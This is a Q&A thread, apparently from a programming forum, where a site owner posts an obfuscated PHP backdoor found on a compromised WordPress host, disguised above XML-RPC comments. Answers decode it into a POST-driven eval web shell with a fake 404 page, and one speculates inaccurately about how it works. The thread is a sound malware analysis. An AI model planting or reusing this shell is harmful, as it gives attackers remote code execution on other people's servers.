# purpose of malicious file on hosting

Tags: php, eval

Hi there I have malicious php file on server and I downloaded that file in my computer. This file contains small malicious code and trying to execute eval command. I don't know what impact that file leave on my server. Please if anyone can reply to me with this code please.

```php
$q22 = "fo\\@5HL[\r.S4awj\t)n`x}\"UZ\$gr(+JO2i* I;3XCvBk>m,NzEc_6qD?9PYhuV:bl|WK&Q=#y~/t!\neAp7]{M1Fd%0-^8GR'<sT";

$GLOBALS['owyeq61'] = ${$q22[50].$q22[56].$q22[30].$q22[10].$q22[97]};
$GLOBALS['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26];

if (!empty($GLOBALS['owyeq61']['mc589a12e'])) { 
    eval($GLOBALS['owyeq61']['mc589a12e']);  
}

$GLOBALS['tmiok36']($q22[5].$q22[97].$q22[97].$q22[56].$q22[73].$q22[84].$q22[9].$q22[88].$q22[34].$q22[11].$q22[88].$q22[11].$q22[34].$q22[46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86]); 

echo $q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76];
/**
 * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */

/**
 * Whether this is an XML-RPC Request
 */
```

Comment: I would remove the site from the host, delete the database, update your local version to the latest Wordpress and plugin versions, change any username/password (on the hosting and for the Wordpress admin, since it's better to be safe than sorry) and upload it again. Also, you should Google to see if any plugin is known to have security issues. It wouldn't be the first time a crappy plugin causes problems like this. Other than that, not much we can do about it.

Answer (score 1):

This piece of code will execute any PHP code that is sent to your page with `POST` request, in a field `mc589a12e`.

This is the code after evaluating the concatenations of `$q22`:

```
$GLOBALS['owyeq61'] = ${'_POST'};
$GLOBALS['tmiok36'] = 'header';
if (!empty($GLOBALS['owyeq61']['mc589a12e'])) {
    eval($GLOBALS['owyeq61']['mc589a12e']);
}
$GLOBALS['tmiok36']('HTTP/1.0 404 Not Found');
echo '<h1>404 Not Found</h1>
The page that you have requested could not be found.';
```

Answer (score 1):

I run the code in a sandbox mode.

```
$test['owyeq61'] = $q22[50].$q22[56].$q22[30].$q22[10].$q22[97];
// return POST

$test['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26];
// return Header

$q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[  46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76];
// returns 404 Page not found
```

But in the eval its get tricky. It looks for the global header `mc589a12e` it is not in the code, so I think its set in wordpress somewhere, the script rewrite this global to `HTTP/1.0 404 Not Found`. Maybe to bypass a security check.

Its needless to say to delete this file from your server and update your system / check user/writing rights.

Maybe use this as your checklist 
https://codex.wordpress.org/FAQ_My_site_was_hacked